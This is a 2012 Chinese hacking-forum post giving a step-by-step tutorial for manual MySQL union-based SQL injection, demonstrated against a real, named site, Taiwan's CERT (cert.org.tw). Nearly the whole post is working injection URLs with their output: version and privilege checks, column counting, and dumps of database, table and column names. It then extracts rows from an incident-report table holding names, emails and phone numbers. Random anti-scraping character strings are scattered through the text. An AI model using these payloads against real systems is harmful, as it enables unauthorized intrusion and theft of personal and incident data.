找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1954|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
9 w4 A* t$ Z  a' V9 a! d2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
4 D  W/ W# k" M0 Ohttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
7 O1 w1 _8 [  U9 @1 s* G% I) b3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--0 M6 E% d5 P' ?0 D7 r/ e
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。( _. v' q( m6 j5 Z' n: B
4.判断有没有写权限
6 X+ a9 F4 m& U( H: d( phttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限' Y. Z8 v3 S$ x. z, V
没办法,手动猜表啦! O/ h# N0 C9 ]  K/ {7 G! D
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,19 g! E& B# N; b( V2 g6 i+ p# O" `
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
* \- }$ l+ k* E6 J; c4 ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
8 {" m3 }1 N. z" P. s5 Y6 C: u成功查出所有数据库,国外的黑客就是不一般。数据库如下:* D7 ?& e- r. Q' @
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
) L6 ?8 l3 p9 l- u3 g6.爆表,爆的是twcert库
' b" Q, [# G2 }+ }http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--/ @- L6 R6 l- e6 h1 D8 U0 B
爆出如下表  {  U9 i/ V2 f: T1 {# C
downloadfile,irsys,newsdata,secrpt,secrpt_big5' T7 ^  i# n8 G
7.爆列名,这次爆的是irsys表( N& H+ o' t- ?+ p: H; u  V) e4 G
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
) ]& T; K2 f; M6 ^6 ]* s爆出如下列
& b' p0 D& n+ a$ l% ]4 u: N8 Iir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
, U* l' e0 }, m8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。# r0 O# k- I  ~* I% q
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--6 C3 J- r! a* Z4 n
返回是3,说明每个列里有3个地段
# x% \" B/ g0 n' v4 ^0 }9.爆字段内容
' {, C, A' R. ~' p" b# rhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
/ W/ A( Y( E  r5 Y5 M爆出name列的第一个字段的内容/ G6 m( K+ l* ^, K+ G) b
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
; q" B  n; ?8 l4 {爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表